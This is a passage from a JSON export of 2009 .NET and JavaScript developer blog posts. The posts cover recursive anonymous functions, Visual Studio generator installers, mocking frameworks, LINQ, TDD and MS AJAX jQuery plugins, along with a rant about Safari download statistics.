reference to the currently executing function, sadly in .NET we don’t have that, so we have to find it ourselves. Remember, this is an anonymous function, but .NET doesn’t have true anonymous functions, the compiler creates it on our behalf.
The method name is something like “<>b__0”, but it’s compile time generated so I don’t really know (I’m sure if you read the documentation on the C# compiler you may be able to work it out, good luck with that :P).\nWe need to look into the stack frame to work out where we are, like this:\nvar thisMethod = new StackFrame(0).GetMethod(); This will return an object representatnion of the current method, which we can invoke ourselves!\nreturn (XElement)thisMethod.Invoke(e, new object[] { ee }); But what’s the invoke doing? Well we’re passing in an instance of the current XElement (e) and we’re doing it for each of that XElements children (e.Elements(), represented by ee). Here’s the recursive part of the method.\nSo lets put it all together:\nif (e.Name == "what_i_want") { return e; } else { if (e.Elements().Count() != 0) { var thisMethod = new StackFrame(0).GetMethod(); foreach (XElement ee in e.Elements()) return (XElement)thisMethod.Invoke(e, new object[] { ee }); } return null; } So that’s the body of the anonymous function, where the variable e is a XElement object. We check the name against the one we want, if it’s not we’ll check it’s children. Alternatively you could do this as a Func<XElement, bool> which would only return the items into the IEnumerable<>, but by returning null we can see how many trees were followed which turned out to be duds. Just change the return statements to boolean values and pass it to anything that takes Func<XElement, bool> (like Where, First, etc).\nSo how do we use it? Like this:\nvar nodes = root.Elements().Select(e => { if (e.Name == "what_i_want") { return e; } else { if (e.Elements().Count() != 0) { var thisMethod = new StackFrame(0).GetMethod(); foreach (XElement ee in e.Elements()) return (XElement)thisMethod.Invoke(e, new object[] { ee }); } return null; } }); And how does it perform, well it’s about 10x slower, but hey, there’s nothing wrong with trying to achieve something crazy! :P\n", "id": "2009-07-15-recursive-anonymous-functions-the-net-version" }, { "title": "People can come up with statistics to prove anything. 14% of people know that", "url": "https://www.aaron-powell.com/posts/2009-06-13-people-can-come-up-with-statistics-to-prove-anything-14-of-people-know-that/", "date": "Sat, 13 Jun 2009 12:05:53 +0000", "tags": [ "Rant" ], "description": "", "content": "Ok, I'm going to go on a bit of a rant here.\nI'm a Mac user, have been for nearly 2 years now and I think buying a Mac was one of the smartest moves I made as a Microsoft developer; I can run virtual machines for everything I do, easily swapping between different OSes. I currently have XP, Vista and Win7 all on my Mac so I can easily test IE6 -> IE8 without any hacks.\nBut Apple can really piss me off some times. This week has seen WWDC going on in the US and by-and-large I've been underwhelmed by it, almost to the point where I'm just plain annoyed at Apple and their marketing attitude.\nAnd today I read an article which really got me angry, Apple announced that Safari 4 has had 11 million downloads. Now if you read that article you'd think that Safari has become the most dominate browser on the planet. 
I mean, Safari has always been a bit-player running along behind the likes of IE and Firefox like the annoying yappy little dog trying to be one of the big fellows.\nYou know what, nothing has changed.\nWhat Apple have failed to mention in their announcement is that Safari 4 is pushed out to all OS X 10.5 (and 10.6 beta users I guess) as a system update, and at that, a pre-selected system update.\nSo I've installed Safari 4, but I use it maybe 1% of my browsing time (I'm one of those really horrible people who uses an even more obscure browser, Opera :P), but hey, I'm part of the 11 million strong loyal Safari fan-base. \nSure Microsoft probably has IE8 listed as an update for Vista (work domain policy just auto-updates for me, I don't ever look at them) but I remember when IE7 was released for XP it wasn't selected-by-default as an install, it was an optional. Sure Safari 4 was an optional upgrade, but when something is optional by opt-out rather than optional by opt-in you find more people will not bother to opt-out.\nUsing Apple's logic we can say that 20 million people think Kevin Rudd is a good prime minister. After all, the population of Australia is 20 million, he's the PM and to the best of my knowledge there isn't any kind of coup d'état planned to remove him from power.\nAs the great Homer Simpson said \"People can come up with statistics to prove anything. 14% of people know that\".\nOh, and to close off, this post was written in Safari 4 on OS X ;).\n", "id": "2009-06-13-people-can-come-up-with-statistics-to-prove-anything-14-of-people-know-that" }, { "title": "Creating an installer for a Single File Generator - Part 2", "url": "https://www.aaron-powell.com/posts/2009-06-08-creating-an-installer-for-a-single-file-generator---part-2/", "date": "Mon, 08 Jun 2009 11:41:59 +0000", "tags": [ "Visual Studio", "LINQ to Umbraco" ], "description": "", "content": "This post will be looking at another problem I had to overcome with creating the SFG for LINQ to Umbraco, this time I'll look at how to do an installer while using wild-card version numbering.\nI'm a big fan of wild-card versioning of assembliies, and if you're not familiar with what I'm taking about I'm referring to when you make the assembly version number end in a * within the AssemblyInfo.cs file, eg:\n[assembly: AssemblyVersion(\"0.0.1.*\")] So what's the point of this? Well I find it useful when you're doing development and releases to know exactly where you're at. There's nothing worse than going to update an environment, but then you find out that the same version is already there. Was it because the developer hadn't incremented the version number, or did I miss the deployment?\nBy using wild-card versioning the numbers for the * are generated by the compiler on the fly. I'm not 100% sure how it can it is generated, I got a little bit of information from a developer on the VS core team stating:\nWhen versioning as #.#.x.y x is generated as the number of days since some time in 2000 (which you can work out fairly easily) and y is the number of seconds since midnight on the date divided by 2.\nPretty sweet but it means that knowing the version number before compile time is next to impossible. This makes a real problem when doing the CLSID registry key which I talked about in Part 1 of this series.\nSo how do we get around this? 
Well the obvious way is to make a fixed version number, but as I stated I don't like doing that, particularly when I'm doing the development, I'm really wanting to know what version of the generator is running vs what version I last compiled.\nWell, how do we get around it?\nIntroducing System.Configuration.Install.Installer (System.Configuration.Install)\nWe need to make a class which inherits from the Installer class. This will allow us to run custom .NET code during the installer which we can do what we want, like say, edit the registry.\nThere are two methods which should be overriden, Install and Uninstall. If we're modifying the registry we need to write our own custom code to undo those changes. No one likes it when software doesn't clean up after itself.\nBecause we're going to need to know the version of the assembly the best place to add this is within the same assembly as the SFG itself.\nRegistry editing 101\nThere's lots of good tutorials on editing the registry with .NET so I'll just cover the basics. First off you need to create the generator key within the CLSID key:\nRegistryKey genKey = Registry.LocalMachine.CreateSubKey(@\"Software\\Microsoft\\VisualStudio\\9.0\\CLSID\\{52B316AA-1997-4c81-9969-95404C09EEB4}\");  Next we need to create the values for the registry key via genKey.SetValue(name, data). So it will look like this:\ngenKey.SetValue(\"Assembly\", Assembly.GetExecutingAssembly().FullName); genKey.SetValue(\"Class\", \"Umbraco.Linq.DTMetal.CodeBuilder.LINQtoUmbracoGenerator\"); genKey.SetValue(\"InprocServer32\", Path.Combine(Environment.GetEnvironmentVariable(\"SystemRoot\"), @\"system32\\mscoree.dll\")); genKey.SetValue(\"ThreadingModel\", \"Both\"); genKey.Close(); Since we need to get the full name of the assembly, including version number (which we don't know!) we can just use reflection against the current assembly. And also we don't have the Installer environment variables so we need to map the path ourselves. And once done close off the registry.\nWrapping It Up\nTo finish it up we need to add an attribute to our custom installer class:\n[RunInstaller(true)] And then edit the Custom Actions section of the Windows Installer project and specify that the output of the SFG assembly will be used in both the Install and Uninstall steps.\nConclusion\nSo this is how you go about doing a SFG with wild-card assembly versioning and setting the registry up correctly.\n", "id": "2009-06-08-creating-an-installer-for-a-single-file-generator---part-2" }, { "title": "Creating an installer for a Single File Generator - Part 1", "url": "https://www.aaron-powell.com/posts/2009-06-08-creating-an-installer-for-a-single-file-generator---part-1/", "date": "Mon, 08 Jun 2009 10:40:41 +0000", "tags": [ "Visual Studio", "LINQ to Umbraco" ], "description": "", "content": "LINQ to Umbraco is trucking along brilliantly and I recently solved a really big problem that I had, creating a Single File Generator (SFG).\nFor anyone who's not familiar with a SFG it is a tool for Visual Studio which allows a document to have .NET code generated for it when the file is saved (or the custom tool is explicitly run). 
There's a very good example as part of the Visual Studio 2008 SDK which covers how to create a SFG (here is the documentation for it).\nThe most familiar SFG people will know is the one used by LINQ to SQL or Entity Framework.\nThe above linked document (and the SDK example) are great for explaining how to create the SFG, but there is something which it doesn't cover, how do you provide a redistributable for it?\nThis was a major problem that I was having, I couldn't work out the best way to achieve it. Luckily I came across a project which showed me how it was to be done, in the form of LINQ to SharePoint. There are a few registry keys that need to be inserts in the right places, and if it wasn't for LINQ to SharePoint I wouldn't have been able to find anywhere which explained it.\nFirst off you need to have an Installer project, and I'm going to make the assumption that that has been done and that the DLL's you want deployed are linked in already.\nRegistry Keys\nThe keys need to be added with HKEY_LOCAL_MACHINE (HKML) and the first one is in a key called AssemblyFolderEx. The full path we'll be creating the key is HKLM\\Software\\Microsoft\\.NETFramework\\v3.5\\AssemblyFolderEx. In this key you'll need to create a new key, which has the name of the SFG (eg: LINQtoUmbracoGenerator) and it has a default value of [TARGETDIR], which is a variable from within the installer.\nI'm not 100% sure of the point of this registry key, nor if it's actually required. Better safe than sorry in my opinion though :P\nNow we need to create the registry keys within Visual Studio to activate the SFG, there's actually 2 - 3 (depending what languages you support) that need to be created.\nThe CLSID Key\nThe CLSID key is used to define assembly, class and some other data about your SFG. This key will reside in HKLM\\Software\\Microsoft\\VisualStudio\\9.0\\CLSID\\. In this registry key you need to create a new key which uses the GUID of your generator class as it's name. So for LINQ to Umbraco I ended up with a key like this:\nHKLM\\Software\\Microsoft\\VisualStudio\\9.0\\CLSID\\{52B316AA-1997-4c81-9969-95404C09EEB4}\nInside this key we need to create the following (all String values):\nAssembly Full name of the assembly (including version, public key, etc) Class Full name of the class of the SFG InprocServer32 [SystemRoot]\\system32\\mscoree.dll (not quite sure what this is for) ThreadingModel Both (again, don't really know what it's for) Now the CLSID is set up for the generator so Visual Studio will be aware of where the class to invoke resides.\nThe Language Generators\nAlthough the CLSID is set up you need to set the generator names for the language(s) you are supporting. LINQ to Umbraco supports C# and VB.NET so I'll point out both in here.\nAll the installed SFG's are kept under a single key within the registry, which is HKLM\\Software\\Microsoft\\VisualStudio\\9.0\\Generators. 
If you look at this within your registry there will be a number of different GUID's (changing depending on what Visual Studio languages you have installed).\nFor VB.NET you need to create under the {164B10B9-B200-11D0-8C61-00A0C91E29D5} key, and for C# place under {FAE04EC1-301F-11D3-BF4B-00C04F79EFBC}.\nUnder the language keys you need to create a new key with the name of your generator (eg: LINQtoUmbracoGenerator) with the following values:\n(Default) - String Friendly name of your generator (eg, VB LINQ to Umbraco Generator) CLSID - String GUID (including {}) of the CLSID defined earlier GeneratorDesignTimeSource - DWORD 1 if you want to generate on save (I think!) Replicate that under each of the language you want to support.\nConclusion\nSo that concludes part 1, the registry keys are the most frustrating part, but once they are working it's such a relief. If the above was confusion (which I'm not doubting it was) I'd suggest you grab a copy of the LINQ to Umbraco source from CodePlex and just look at what is setup in there.\n \nUpdate: Just realised I had a registry key wrong. It should have been HKLM\\Software\\Microsoft\\v3.5 not HKLM\\Software\\Microsoft\\3.5\n", "id": "2009-06-08-creating-an-installer-for-a-single-file-generator---part-1" }, { "title": "Recursive Anonymous Functions", "url": "https://www.aaron-powell.com/posts/2009-06-06-recursive-anonymous-functions/", "date": "Sat, 06 Jun 2009 00:00:00 +0000", "tags": [ "javascript", "black-magic" ], "description": "To know recursion you must first know recursion", "content": "I was on StackOverflow the other day and I was reading a post about the strangest programming language you’ve ever used. While looking at what people have used I realized I haven’t worked with anything that strange.\nBut then I was thinking there is one language I used that’s a bit strange, JavaScript.\nWithout going into all the weirdness of the JavaScript language I’d like to focus on one bit craziness which I’m quite fond of, self executing recursive anonymous functions. Yeah it’s a bit of mouthful but it’s also a bit of fun, and may even have some practical uses.\nWe’re all familiar with JavaScripts ability to do anonymous functions, they are often used within event delegates and and constantly used when doing jQuery. Something like this:\njQuery('#button').click(function() { ... } ); So that’s the anonymous part of what we’re trying to achieve, now lets look at self executing functions. JavaScript can do self executing functions, they are generally used for creating objects. jQuery is in fact an example of this, which is why if you do a typeof jQuery you get function as the response. For example:\nvar result = (function() { ... })(); Notice the () at the end, this tells the function to execute and take no parameters. But you can also do this:\nvar result = (function(node) { ... } )(document.getElementById('button')); I’m not going to cover what a recursive function is, I’m sure we all know what they are, but I did raise a problem, we’re using anonymous functions, how do I call a function without a name?\nWell JavaScript actually has a way of doing this, every JavaScript function has a hidden parameter called arguments, this is a collection of all the arguments passed into the function in the order they were passed in. So you can do something like this:\n(function() { for(var i = 0; i < arguments.length; i++) { alert(arguments[i]); } })("hello", "world"); This will do two alerts, the first saying hello the second saying world. 
But there’s another property on the arguments object, arguments.callee. This is a reference to the function that is currently executing. And because it’s a reference to the function we can have some real fun, because you can execute arguments.callee!\nSay I wanted to know if a node is a child of a node with a particular ID, I can do this:\nvar isChild = (function(node) { if(node) { if(node.id === 'parent') { return true; } else { return arguments.callee(node.parentNode); } } else { return false; } })(document.getElementById('child')); How nifty! Ok, yeah it does make the function a lot less reusable, but hey, this was an example of the craziness of the JavaScript language! Oh, and I have used this before, see my post Creating jQuery plugins for MS AJAX components, dynamically!\nAnd this is why JavaScript is the strangest language I have ever used.\n", "id": "2009-06-06-recursive-anonymous-functions" }, { "title": "Isolating vs Mocking", "url": "https://www.aaron-powell.com/posts/2009-06-01-isolating-vs-mocking/", "date": "Mon, 01 Jun 2009 21:46:45 +0000", "tags": [ "Unit Testing", "Typemock" ], "description": "", "content": "I've been doing a lot of playing with testing frameworks and working out what's best to use for different needs. There's two kinds of frameworks out there for .NET, mocking frameworks and isolation frameworks.\nThere are different reasons for using the different framework types and I'm going to try and explain which one is a good choice for what you're trying to do.\n \nWhat is mocking?\nMocking is the concept of producing fake versions of the objects you want to operate with. With these fake versions you then are able to specify how they operate, what their methods will return, etc.\nThere's quite a few frameworks available for mocking, RhinoMocks, Moq and NMock to name a few. These are all open source projects and they are all very good. They each offer very similar features, the kind of features which are expected by developers such as:\nMocking properties and methods Expecting calls Asserting execution paths Mocking frameworks are best when you've got full control over the components being used, or the components used are prebuilt with mocking designed in.\n \nWhat is isolating?\nIsolating is similar to mocking, but it is much more broadly focused, with the idea that you make fake versions of everything, regardless of whether you developed the component or not.\nThis is why isolating frameworks are becoming popular with hard-to-mock components such as CMS cores, ASP.NET or Silverlight.\nWhen it comes to isolation frameworks in .NET Typemock is one of the biggest players. Their framework is well designed for testing SharePoint, ASP.NET (via Ivonna) and others. But it's quite possible to use Typemock to mock out other systems such as the .NET framework (with the limitation of mscorlib, but that's changing!) or other CMS's such as Umbraco.\n \nWhat makes mocking different to isolation?\nSo now that we've got a bit of a background on mocking and isolating what's the difference between the two, why would you use Typemock which isn't free over RhinoMocks which is?\nWell it really comes down to what you're trying to do, mocking frameworks are only useful when the project is designed for mocking, where as isolating can be done more after the fact.\nTo understand what I mean by this you really need to understand how the framework types work. Most of the free mocking frameworks are built on top of the DynamicProxy which is used for dynamically generating the classes.
This is how the mocking frameworks operate, an implementation of the class is dynamically created. This is why working with mocking frameworks really require the code to be designed for mocking. If your class is sealed, or your method is non-virtual it is no longer able to be mocked. Because of how DynamicProxy works it implements the class with the rules specified, but if it's sealed, it can't have an implementation done. Same with non-virtuals, if an override can't be performed there is no way to add your own rules.\nTypemock's Isolator on the other hand uses black magic to achieve what it does. Ok, well not black magic but close, I'm not really privileged to it's operation, but from my understanding it uses a profiler to analyze the execution path and then creates the rules specified in raw IL and inject that. This means that the restraints of DynamicProxy no longer apply. Since the IL is being injected on-the-fly anything can be faked. Sealed classes, non-virtuals, even objects without public constructors!\n \nWhich to use when?\nSo which should you be using and when? Well mocking is great when you're starting a new project, when you've got ground up control over what's being developed. Making something that is 100% mockable is a very difficult task though, it requires a lot of design though, and ensuring that all data required for an operation is either passed is or available on the base object.\nThis can lead to what I consider lax design, particularly when you're developing a framework of your own. Because everything has to be unsealed and virtual it can lead to undesirable extensibility.\nI'm from the school of thought that classes should be sealed-by-default. If something is to be extended I'll design it for extensibility, and if I don't want it extended or don't think it should be extended I wont make it available for extension.\nAnd here is where isolation frameworks come in, they allow for this kind of design. Because they don't require the classes or methods designed for extensability it means tighter design but testing still achievable.\nAdditionally it does mean that it's possible to fake out systems you have no control over, such as a CMS which are inheritly untestable.\nSome people are concerned about this kind of faking power, that you're possibly making assumptions of how an external system will operate which may be incorrect. But if that is the case then you're placing too much on the unit tests, without having any integration tests to back up the assumptions.\n \nConclusion\nHopefully this has shed some light onto the world of mocking and isolating. But really the best way to work out what's right for you is to grab a copy and get coding! 
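To make the sealed/non-virtual limitation concrete, here's a minimal C# sketch (the types are made up for illustration, they aren't from any real project): a DynamicProxy-based framework fakes a type by generating a subclass at runtime and overriding its members, so anything it can't subclass or override is off limits.
// A proxy-based framework can only intercept members it can override.
public class PriceService
{
    // virtual: a dynamically generated subclass can override this and return whatever the test specifies
    public virtual decimal GetPrice(string sku) { return 42m; }

    // non-virtual: no override is possible, so a proxy can't substitute its own behaviour here
    public decimal GetTax(decimal price) { return price * 0.1m; }
}

// sealed: no subclass can be generated at all, so the whole type can't be proxied.
// An isolation framework that rewrites IL at runtime isn't bound by either restriction.
public sealed class LegacyGateway
{
    public string Fetch(string key) { return "real value"; }
}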
\n", "id": "2009-06-01-isolating-vs-mocking" }, { "title": "Using Umbraco in a WPF application", "url": "https://www.aaron-powell.com/posts/2009-05-30-using-umbraco-in-a-wpf-application/", "date": "Sat, 30 May 2009 10:40:27 +0000", "tags": [ "Umbraco", "LINQ to Umbraco" ], "description": "", "content": "One of the goals of LINQ to Umbraco is to be able to have Umbraco applications which are done without a web context, starting to using Umbraco as a service.\nNow there's been plenty of ways to do this in the past, you can quite easily have a web service which pushes out the data you require, but I wanted to do it entirely without web stuff.\nWith Code Garden coming up in a few weeks I decided to have a look into writing something to show off the concept I was thinking of, that you could write a WPF application which is entirely driven from Umbraco content.\nWhen reading a recent blog post from Scott Hanselman in which he talks about a tool he uses when doing presentations which reads Twitter hash tags and he can get audience feedback. So I thought, why not do that, but using Umbraco for the messages rather than Twitter.\nEnter the Umbraco Notifier\nSo my concept was decided, you would have a small WPF app that sits in the system tray and check an Umbraco XML file for changes.\nTo go along with that I would have an Umbraco instance running which has a simple web form that people can submit their notification to me.\nNow I'm not going to give away the code here, thats a secret for CG, but pictures are worth 1000 words, so how many words is a screen cast worth? Follow the link to see the notifier in action!\nYou'll probably want to turn your computer speakers off, I'm still learning how to use the software and the background noise is well... backgroundy :P.\n \nSo there you have it folks, an Umbraco driven WPF application, with LINQ to Umbraco in full operation. \n", "id": "2009-05-30-using-umbraco-in-a-wpf-application" }, { "title": "Windows 7, Virtual XP and I'm worried", "url": "https://www.aaron-powell.com/posts/2009-05-24-windows-7-virtual-xp-and-im-worried/", "date": "Sun, 24 May 2009 11:03:22 +0000", "tags": [ "Random Junk" ], "description": "", "content": "As most people are aware by now Windows 7 will be having the ability to run a virtualised version of Windows XP within it. Scott Hanselman has a good post up on it (see here), even Karl bounced a post about it.\nPersonally I'm not that interested in it, in fact I think that the idea is very bad, by adding this it's essentially preventing to EOF of Windows XP.\nWindows XP is 8 years old this year, that's a long time in computing years. 
As Jeff Atwood points out in his post, the specs of an average XP release pc was archaic by todays standards.\nSure it's true that by having the virtual XP it'll improve backwards compatibility, but this is something that I believe is hurting Microsoft as well.\nApple is notorious for not caring as much about backwards compatibility, particularly with their iPod range, simply stopping to support architectures, stuff like that.\nIt allows Apple to have less worries in a new version, the old stuff doesn't \"half work\", it simply doesn't work.\nSure you'll piss people off, their software no longer works so they have to invest in making it work, but doesn't active development like that ensure that software doesn't become stagnate?\n \nBut really, my main issue with the virtual XP can be seen in this image.\nVirtual XP will increase the life of IE6, if an organisation can roll out Win7 but still have their shit IE6-designed internal software still used via virtual XP, why bother upgrading it, we may as well keep it around for a while longer.\nAs a web developer I am waiting for the day when IE6 is no longer among us, but now it looks like that day is a lot further away than I'd like. \n", "id": "2009-05-24-windows-7-virtual-xp-and-i'm-worried" }, { "title": "Query Syntax vs Method Syntax", "url": "https://www.aaron-powell.com/posts/2009-05-19-query-syntax-vs-method-syntax/", "date": "Tue, 19 May 2009 00:00:00 +0000", "tags": [ "linq", "c#", ".net" ], "description": "What's the difference with LINQ to using query syntax to pure lambda expressions?", "content": "While working on an IQueryable<T> provider I was having a problem when doing LINQ statements via the Query Syntax that wasn’t happening when using the Method Syntax (chained lambda expressions).\nAnd that problem has lead to an observation I made about LINQ, well, about Expression-based LINQ (ie - something implementing IQueryable, so LINQ to SQL, etc).\nI’ll use LINQ to SQL for the examples as it’s more accessible to everyone.\nTake this LINQ statement (where ctx is an instance of my DataContext):\nvar items = ctx.Items; That statement returns an object of Table<Item>, which implements IQueryable<T>, IEnumerable<T> (and a bunch of others that are not important for this instructional). So it’s not executed yet, no DB query has occured, etc. Now lets take this LINQ statement:\nvar items2 = from item in ctx.Items select item; This time I get a result of IQueryable<Item>, which implements IQueryable<T> (duh!) and IEnumerable<T> (and again, a bunch of others).\nBoth of these results have a non-public property called Expression. This reperesents the expression tree which is being used to produce our collection. But here’s the interesting part, they are not the same. That’s right, although you’re getting back basically the same result, the expression used to produce that result is really quite different.\nThis is due to the way the compiler translates the query syntax of LINQ into a lambda syntax. In reality the 2nd example is equal to this:\nvar items2 = ctx.Items.Select(item => item); But is this really a problem, what difference does it make? In the original examples you actually get back the same data every time. You’ll have slightly less overhead by using the access of Table<T> rather than IQueryable<T>, due to the fact that you’re not doing a redundant call to Select. 
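If you want to see this for yourself, here's a rough sketch; I've swapped the LINQ to SQL Table<Item> for a plain array pushed through AsQueryable() so it runs without a database, but any IQueryable<T> shows the same thing:
using System;
using System.Linq;

class ExpressionDemo
{
    static void Main()
    {
        var items = new[] { 1, 2, 3 }.AsQueryable(); // stand-in for ctx.Items

        var direct = items;                      // direct access to the source
        var queried = from i in items select i;  // compiled to items.Select(i => i)

        Console.WriteLine(direct.Expression);    // just a ConstantExpression over the source
        Console.WriteLine(queried.Expression);   // contains the extra Select MethodCallExpression
    }
}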
But in reality you would not notice the call.\nThis has caused a problem for me as my direct-access lambda syntax fails my current unit test, where as the query syntax passes. Now to solve that problem! ;)\n", "id": "2009-05-19-query-syntax-vs-method-syntax" }, { "title": "Book review - Advanced ASP.NET AJAX Server Controls", "url": "https://www.aaron-powell.com/posts/2009-05-17-book-review---advanced-aspnet-ajax-server-controls/", "date": "Sun, 17 May 2009 15:11:09 +0000", "tags": [ "ASP.NET", "AJAX", "JavaScript", "Book Review" ], "description": "", "content": "A couple of months ago I picked up a cope of Advanced ASP.NET AJAX Server Controls and read it cover-to-cover.\nWhen ASP.NET AJAX was first released back in 2007 I bought Professional ASP.NET AJAX and read it cover-to-cover, so this wasn't my first foray into .NET AJAX books. But I must say that i completely pales in comparison to Advanced ASP.NET AJAX Server Controls.\nFirst impressions\nWhen I started reading the book I was expecting it to be completely .NET based, but to my surprise the first few chapters are entirely JavaScript programming based. The book looks at common JavaScript programing concepts, as well as looking at the MS AJAX model and what advantages it has.\nThe later chapters in the book start looking more into mixing JavaScript with .NET server controls (hence the title), but in a way which makes it seem that doing so is a viable option.\nUnderstanding the MS AJAX framework\nI've done quite a bit with MS AJAX since it was first released, and thought myself reasonably adept in understanding what you can do with it, but after reading the early chapters I found out that I hadn't really scratched the surface.\nSome of the things I really liked was how the authors explain the difference between Sys.Component, Sys.UI.Control, and Sys.UI.Behavior, something which I didn't fully understand prior to reading through the book.\nI also really liked how they explained the MS AJAX client life cycle much better than I'd previously encountered. \nHow events are registered, how the internals of Sys.Application works, etc, are reason enough to buy the book.\nMS AJAX and ASP.NET\nWhen I started with ASP.NET AJAX I was like a lot of people and thought that UpdatePanel's were awesome. I've since changed my thinking but I there are places where they can still be of use. The book covers how to best work with them and pure AJAX implementations, or how your own ASP.NET AJAX server controls can avoid problems with them.\nThe book also looks at how to write server controls specifically designed for ASP.NET AJAX integration, and the difference between a server control and a server control behavior.\nAgain a concept that a lot of developers don't seem to pick up on.\nConclusion\nIf you're an ASP.NET developer who is serious about doing AJAX work then I cannot recommend this book more highly. 
I loaned it to one of our user interface developers at work (who was not sold on the idea of MS AJAX as a client framework) and he is now using the framework (and design pattern) in a WYSIWYG editor which he is building.\nThe long and the short is, buy this book.\n", "id": "2009-05-17-book-review---advanced-aspnet-ajax-server-controls" }, { "title": "LINQ to Umbraco update (number 2)", "url": "https://www.aaron-powell.com/posts/2009-05-17-linq-to-umbraco-update-number-2/", "date": "Sun, 17 May 2009 14:44:04 +0000", "tags": [ "LINQ to Umbraco" ], "description": "", "content": "I thought today was an apt time to post another update on LINQ to Umbrace, as one month from today I'll be in Copenhagen Denmark preparing for the Umbraco retreat and then Code Garden '09.\nSo what's the status? Anyone who follows the check-ins on Umbraco in Codeplex will have noticed that I haven't really done a lot lately.\nI am still working on it but I've not recently had as much time as I would have liked.\nA lot of the code has been coming together nicely, the provider model is working very well and the unit testability of the codebase is meeting its design.\nBasically I am on track to have a good working prototype to demo at Code Garden this year!\nSo all you lucky people who will be attending should expect a nice bit of a show :) \n", "id": "2009-05-17-linq-to-umbraco-update-(number-2)" }, { "title": "Is TDD worth it?", "url": "https://www.aaron-powell.com/posts/2009-05-12-is-tdd-worth-it/", "date": "Tue, 12 May 2009 23:07:54 +0000", "tags": [ "Unit Testing" ], "description": "", "content": "Today Alistair Denyes finally gave the presentation on Integration Testing which he's been saying he'd give for something like 12 months, so I thought it'd be a good idea to get around to doing this post which I've been putting off for quite a while.\nFirst off I'll start by saying that this isn't about the concept of testing, I do think that testing (both Unit and Integration) is a good idea, it's Test Driven Development (TDD) which I have some problems with.\nOne of the goals when I started LINQ to Umbraco was to ensure that I had high test coverage and that I followed TDD.\nWell that turned out to be not such a good idea. \nMaybe I'll start with some background of what TDD is, just to make sure that we're all on the same page.\nTDD is the idea of writing a test, watching it fail and then implementing the code to make the test past.\nYou do this over and over again, writing more and more code each time until you have all the scenarios completed.\nAnd this is where I found the problem, while writing LINQ to Umbraco I had some idea of what I was doing, but not a huge idea. 
A lot of the code was prototyping before becoming the real code which got committed to CodePlex.\nStarting to see why I don't think TDD works?\nWhen you're going on theories your tests are often wrong, which means you write a test to validate an assumption which then turns out to be the wrong, when then makes the test invalid.\nAlso something else that I found out was that when I would go to write my first test I would then realise that I had a lot of missing classes/ methods/ etc so I would have to write a bunch of boilerplate code before I can even have compilable assertions!\nAnd then while trying to write the code which would validate my assertion I realised that unless I was to design myself into a corner I would have to write even more boilerplate code!\nSo now the half a dozen lines required to valid an assertion has become dozens of lines over multiple classes.\nMaybe I'm doing it wrong?\n \nBut I did find some value to TDD, when trying to write a LINQ provider which uses IQueryable<T> there's not a while lot of documentation, this meant that I was going to need some way to work out how to understand Expression Trees work. Thanks to TDD I did manage to write tests which would then run and I could follow their stack trace to determine what code was actually being executed!\nThis is how I worked produced A LINQ observation, oddly there isn't anything else I've found that explains that.\n", "id": "2009-05-12-is-tdd-worth-it" }, { "title": "LINQ in JavaScript - part 2", "url": "https://www.aaron-powell.com/posts/2009-05-05-linq-in-javascript---part-2/", "date": "Tue, 05 May 2009 08:43:05 +0000", "tags": [ "LINQ", "JavaScript" ], "description": "", "content": "Recently I did a blog post on my implementation of LINQ in JavaScript which was just talking about a little project I was working on to produce a LINQ-style API within JavaScript.\nI had planned to release the source code in that post but due to a problem with my blogs Umbraco install I was unable to.\nWell I've finally got around to fixing the media section and now I can provide the code.\nI've done a few tweaks within LINQ in JavaScript, and I've added a couple of new operators, Skip, SkipWhile and Take, all providing the same functionality that their .NET counterparts provide.\nLets have a look at the way some of the code works, we'll look at the where method:\nArray.prototype.where = function(fn) { if (typeof (fn) !== typeof (Function)) throw Error.argumentType(\"fn\", typeof (fn), typeof (Function), \"where takes a function to filter on\"); var coll = new Array(); for (var i = 0; i < this.length; i++) { var ret = fn(this[i]); if (typeof (ret) !== \"boolean\") throw Error.argumentType(\"fn\", typeof (ret), typeof (Boolean), \"function provided to where much return bool\"); else if (ret) coll.push(this[i]); } return coll; } First off you'll notice that I expect a function to be passed into the method, otherwise how would you apply a where?! As you'll notice I'm doing a lot of type checking as well, the parameter for Where needs to be a function, so I explicitly check it so.\nThen it's really just a simple itterator that is used, and pushing each item into a new collection where the provided function returns a boolean value of true.\nAgain you'll notice type checking, this time of the return value of the function. Because JavaScript isn't compiled, and there is no type checking I have to do it manually (this means that I'm doing a traditional LINQ API, not one where you can return anything you like, ala this post). 
Not a big problem, but it does add a little overhead.\nSure you can remove it but then it kind-of defeats what I'm trying to achieve, which is a very type-safe API.\n \nUltimately LINQ in JavaScript is nothing more than throught experiment project. It shows that you can quite easily have a client side query language using JavaScript and functional programming.\nBut I don't recommend that anyone acutally use it. If you're using a client-side query API such as this (or any of the other LINQ implementations for JavaScript) you're doing it wrong. Particularly operators like where, skip, take and even select. These operators are designed to lower/ change the data volume you are working with, which on the client side is not a good idea. It means that you've returned too much data from the server!\nI see the only real useful reason for this (other than just wanting to prove it can be done) is to manipulate a DOM structure, say client-side reordering of a table.\nBut that said anyone who's interested in seeing how it works and having a play yourself you can find the code here.\n", "id": "2009-05-05-linq-in-javascript---part-2" }, { "title": "Creating jQuery plugins for MS AJAX components, dynamically!", "url": "https://www.aaron-powell.com/posts/2009-05-05-creating-jquery-plugins-from-ms-ajax-components/", "date": "Tue, 05 May 2009 00:00:00 +0000", "tags": [ "javascript", "ms-ajax", "jquery" ], "description": "Bringing jQuery and MS AJAX together", "content": "Bertrand Le Roy had an interesting post entitled Creating jQuery plug-ins from MicrosoftAjax components. It’s not a bad concept, but I miss read it when I first had a read, I thought it was creating all of certain types into a jQuery plug-ins.\nBut as I said I miss read it, no drama, I decided to create that on my own. So I created a simple function for Microsoft AJAX which will turn all the loaded Sys.UI.Control types into jQuery plug-ins:\nSys.Application.add_load(function() { var types = new Array(); for (i in Sys.__upperCaseTypes) { var t = Sys.__upperCaseTypes[i]; var ret = (function(type) { if (type && type.__class) { if (type.__baseType) { if (type.__baseType.__typeName === "Sys.UI.Control") { return true; } else { return arguments.callee(type.__baseType); } } } })(t); if (ret) types.push(t); } for (var i = 0; i < types.length; i++) { var t = types[i]; var nameParts = t.__typeName.split("."); var name = t.__typeName; if (nameParts.length > 1) { name = nameParts[nameParts.length - 1]; } jQuery.fn[name] = function(properties) { return this.each(function() { Sys.Component.create(t.__typeName, properties, {}, {}, this); }); } } }); It looks at the collection of registered types which are done when you do MyType.registerClass(“MyType”); so it’s nice easily does them all. It’ll automatically create a plug-in for any type inheriting from Sys.UI.Control, but it can easily be done to any base type which want. So you could use Sys.Component (although I don’t recommend it).\nYeah it’s not really that practical, especially if you have a lot of controls, but it’s just a POC. 
